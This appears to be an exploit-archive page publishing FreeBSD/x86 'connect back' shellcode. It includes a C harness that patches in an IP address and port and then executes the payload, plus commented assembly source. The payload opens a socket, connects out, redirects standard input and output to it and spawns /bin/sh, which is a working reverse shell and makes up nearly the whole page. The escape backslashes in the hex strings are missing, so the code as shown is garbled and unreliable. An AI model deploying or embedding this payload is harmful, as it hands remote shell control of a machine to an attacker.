BSD x86 connect back Shellcode (81 bytes)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BSD x86 connect back Shellcode (81 bytes)
# Published : 2011-01-21
# Author :
# Previous Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
# Next Title : Linux/x86 Remote Port Forwarding Shellcode 87 bytes

/*
 -------------- FreeBSD/x86 - connect back /bin/sh. 81 bytes ----------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (Tested on FreeBSD 8.1)
 *   EMAIL : tosh@tuxfamily.org
 */

#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

char shellcode [] = "x31xc0x50x6ax01x6ax02xb0x61x50xcdx80x89xc2"
                    "x68x7fx00x00x01x66x68x05x39x66x68x01x02x89"
                    "xe1x6ax10x51x52x31xc0xb0x62x50xcdx80x31xc9"
                    "x51x52x31xc0xb0x5ax50xcdx80xfexc1x80xf9x03"
                    "x75xf0x31xc0x50x68x2fx2fx73x68x68x2fx62x69"
                    "x6ex89xe3x50x54x53xb0x3bx50xcdx80";

void change_shellcode(const char *ip, unsigned short port)
{
   *((unsigned long*)(shellcode + 15)) = inet_addr(ip);
   *((unsigned short*)(shellcode + 21)) = htons(port);
}
void print_shellcode(void)
{
   int i;
   for(i = 0; i < sizeof(shellcode) - 1; i++)
   {
      printf("\x%.2x", (unsigned char)shellcode[i]);
   }
   printf("n");
}
int main(void)
{
   const char ip[] = "127.0.0.1";
   unsigned short port = 1337;

   change_shellcode(ip, port);
   print_shellcode();
   printf("Shellcode len = %d bytesn", sizeof(shellcode)-1);
   void (*f)() = (void*) shellcode;

   f();

   return 0;
}

/*
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Syscalls nums, on /usr/src/sys/kern/syscalls.master ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

%define IPPROTO_TCP 6
%define SOCK_STREAM 1
%define AF_INET 2

%define SYS_EXECV 59
%define SYS_DUP2 90
%define SYS_SOCKET 97
%define SYS_CONNECT 98

section .text

global _start

_start:
   xor eax, eax
   ;;;;;;;;;;;;;;;;;;;;;;
   ; socket()
   ;;;;;;;;;;;;;;;;;;;;;;
   push eax
   push byte SOCK_STREAM
   push byte AF_INET

   mov al, SYS_SOCKET
   push eax
   int 0x80
   mov edx, eax

   ;;;;;;;;;;;;;;;;;;;;;;
   ; sockaddr_in
   ;;;;;;;;;;;;;;;;;;;;;;
   push 0x0100007f
   push word 0x3905
   push word 0x0201
   mov ecx, esp

   ;;;;;;;;;;;;;;;;;;;;;
   ; connect()
   ;;;;;;;;;;;;;;;;;;;;;
   push byte 16
   push ecx
   push edx
   xor eax, eax
   mov al, SYS_CONNECT
   push eax
   int 0x80

   ;;;;;;;;;;;;;;;;;;;;;
   ; dup2()
   ;;;;;;;;;;;;;;;;;;;;;
   xor ecx, ecx
.L:
   push ecx
   push edx
   xor eax, eax
   mov al, SYS_DUP2
   push eax
   int 0x80

   inc cl
   cmp cl, 3
   jne .L

   ;;;;;;;;;;;;;;;;;;;;;;
   ; execv("/bin/sh")
   ;;;;;;;;;;;;;;;;;;;;;;
   xor eax, eax

   push eax

   push '//sh'
   push '/bin'

   mov ebx, esp

   push eax
   push esp
   push ebx
   mov al, SYS_EXECV
   push eax
   int 0x80
 */